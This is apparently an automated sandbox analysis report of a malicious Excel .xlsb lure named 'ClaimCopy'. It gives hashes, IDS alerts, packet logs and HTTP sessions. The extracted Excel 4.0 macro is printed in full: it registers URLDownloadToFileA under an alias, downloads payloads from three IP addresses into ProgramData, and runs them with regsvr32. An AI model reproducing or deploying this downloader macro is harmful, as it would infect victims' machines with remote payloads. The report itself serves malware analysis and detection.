Entropy (8bit):	7.830572977398632
Encrypted:	false
SSDEEP:	1536:IeQB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUnPGjQ:Ievc6EehCfCZpUHKGXbBKsiiGOM
MD5:	FD7A189D988925BDF5784D890500A582
SHA1:	8E51A1054D8BD145B8AF98AB593D086AA6DD4727
SHA-256:	AB95C6A9AA4778FF2449AB5C353F5DEB3C5C9D307972957F88A87FABB8BE5846
SHA-512:	24CBAF19F4335CD63162843C2D87F0653D647D853A41ACCE966606FA35B7F302A0559D5C516445F51F05C0021C455E966E51CEA1229DFD25BE27B8AE4BBFBFD5
Malicious:	true
Preview:	PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^\|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...

C:\Users\user\Desktop\~$ClaimCopy-539408676-12022021.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	true
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.831010211626038
TrID:	Microsoft Excel Office Binary workbook document (40504/1) 83.51% ZIP compressed archive (8000/1) 16.49%
File name:	ClaimCopy-539408676-12022021.xlsb
File size:	99677
MD5:	4b4aacfd637f34a8c9111d80578bf275
SHA1:	86b477fdaa06a4fcd7e863af0b7dc9321b9978e4
SHA256:	04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f
SHA512:	0e5babb339a32868b4198c7d2d4714638033602f12bb30582766ae4de5feb8ec41b3ba18e2e36476a5676b97d8312f818daeb4364dd81faf3fa567a17a013c31
SSDEEP:	1536:hMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:Nc6EehCfCZpUHKGXbBKsiiOp
File Content Preview:	PK..........!...~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74f0d0d2c6d6d0f4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "ClaimCopy-539408676-12022021.xlsb"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

8,6,=Drozd(0,"http://185.82.126.78/397887857128.dat","C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://158.69.133.78/397887857128.dat","C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://45.142.211.62/397887857128.dat","C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://45.142.211.62/397887857128.dat2","C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://185.82.126.78/397887857128.dat2","C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://158.69.133.78/397887857128.dat2","C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&"397887857128"&  C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&"397887857128"&  C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&"397887857128"&  C:\ProgramData\Volet6.ocx")
23,6,=HALT()

1,1,523
4,9,34543
4,12,43
5,2,ui
5,9,7
5,14,43
6,14,36
7,0,ug
7,1,&#208;&#181;&#209;&#131;5&#209;&#134;&#209;&#131;5
8,9,34
8,10,5
9,1,y
9,16,346
10,7,rt
10,8,345
10,9,u
11,2,23
11,7,ertertyh57s5ry
11,11,5
11,12,35
12,1,65
12,2,7
12,9,r67
13,2,mfy
13,7,65
13,10,7
13,14,34
13,15,543
14,0,uh
14,1,y
15,0,7
15,7,65
15,10,ae46
16,2,d7
16,3,uRl
17,3,=&#34;Mon&#34;
17,9,dt
17,10,6
17,12,u
17,13,5
18,3,=&#34;URLDownloadTo&#34;
18,8,yu
18,10,sb
18,14,5
19,3,=&#34;JJCCBB&#34;
19,7,f
20,0,7
20,1,7
20,4,185.82.126.78/
20,7,523
20,8,u
21,0,md
21,4,158.69.133.78/
21,6,=RANDBETWEEN(142536473,988879789754)
21,9,s
21,11,m
22,1,7
22,4,45.142.211.62/
22,6,=&#34;.dat&#34;
22,8,6
23,4,45.142.211.62/
23,6,=&#34;.dat2&#34;
23,11,4
23,15,46
24,4,185.82.126.78/
24,6,=REGISTER(D17&#38;D18,D19&#38;&#34;FileA&#34;,D20,&#34;Drozd&#34;,,1,9)
24,8,23
24,14,6
24,15,43
25,1,567
25,4,158.69.133.78/
25,10,23
25,13,5
28,2,756
37,6,=GOTO(Tiposa1!G8)

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/02/21-16:10:25.632241	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49167	185.82.126.78	192.168.2.22
12/02/21-16:10:26.574859	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49168	158.69.133.78	192.168.2.22
12/02/21-16:10:29.832836	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	45.142.211.62	192.168.2.22
12/02/21-16:10:30.027399	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	45.142.211.62	192.168.2.22
12/02/21-16:10:30.211827	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49167	185.82.126.78	192.168.2.22
12/02/21-16:10:30.735520	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49168	158.69.133.78	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 16:18:18.444706917 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:18:18.505961895 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:18:18.506226063 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:18:18.506767035 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:18:18.567588091 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:18:18.632312059 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:18:18.632811069 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:18:18.637854099 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:18:18.741017103 CET	80	49764	158.69.133.78	192.168.2.4
Dec 2, 2021 16:18:18.741499901 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:18:18.741997957 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:18:18.845021009 CET	80	49764	158.69.133.78	192.168.2.4
Dec 2, 2021 16:18:19.321463108 CET	80	49764	158.69.133.78	192.168.2.4
Dec 2, 2021 16:18:19.323215961 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:18:19.328747988 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.331667900 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.368182898 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:18:22.368295908 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.369000912 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.405771971 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:18:22.618542910 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:18:22.618716955 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.625663996 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.662342072 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:18:22.811156988 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:18:22.811366081 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:18:22.813843012 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:18:22.875296116 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:18:22.969954967 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:18:22.970139980 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:18:22.972441912 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:18:23.075622082 CET	80	49764	158.69.133.78	192.168.2.4
Dec 2, 2021 16:18:23.476260900 CET	80	49764	158.69.133.78	192.168.2.4
Dec 2, 2021 16:18:23.476433039 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:19:27.811453104 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:19:27.811933041 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:19:27.970752001 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:19:27.970920086 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:19:28.475512981 CET	80	49764	158.69.133.78	192.168.2.4
Dec 2, 2021 16:19:28.475986004 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:20:03.575555086 CET	49765	80	192.168.2.4	45.142.211.62
Dec 2, 2021 16:20:03.575831890 CET	49764	80	192.168.2.4	158.69.133.78
Dec 2, 2021 16:20:03.576054096 CET	49763	80	192.168.2.4	185.82.126.78
Dec 2, 2021 16:20:03.612149000 CET	80	49765	45.142.211.62	192.168.2.4
Dec 2, 2021 16:20:03.636630058 CET	80	49763	185.82.126.78	192.168.2.4
Dec 2, 2021 16:20:03.678848982 CET	80	49764	158.69.133.78	192.168.2.4

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 2, 2021 16:18:29.915843964 CET	8.8.8.8	192.168.2.4	0x52b2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.82.126.78

158.69.133.78

45.142.211.62

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49763	185.82.126.78	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 16:18:18.506767035 CET	1180	OUT	GET /939602286691.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.82.126.78 Connection: Keep-Alive
Dec 2, 2021 16:18:18.632312059 CET	1181	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 15:18:18 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 2, 2021 16:18:22.813843012 CET	1186	OUT	GET /939602286691.dat2 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.82.126.78 Connection: Keep-Alive
Dec 2, 2021 16:18:22.969954967 CET	1187	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 15:18:22 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49764	158.69.133.78	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 16:18:18.741997957 CET	1182	OUT	GET /939602286691.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 158.69.133.78 Connection: Keep-Alive
Dec 2, 2021 16:18:19.321463108 CET	1183	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 15:18:19 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 2, 2021 16:18:22.972441912 CET	1187	OUT	GET /939602286691.dat2 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 158.69.133.78 Connection: Keep-Alive
Dec 2, 2021 16:18:23.476260900 CET	1188	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 15:18:23 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49765	45.142.211.62	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 16:18:22.369000912 CET	1183	OUT	GET /939602286691.dat HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.142.211.62 Connection: Keep-Alive
Dec 2, 2021 16:18:22.618542910 CET	1184	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 15:18:22 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to 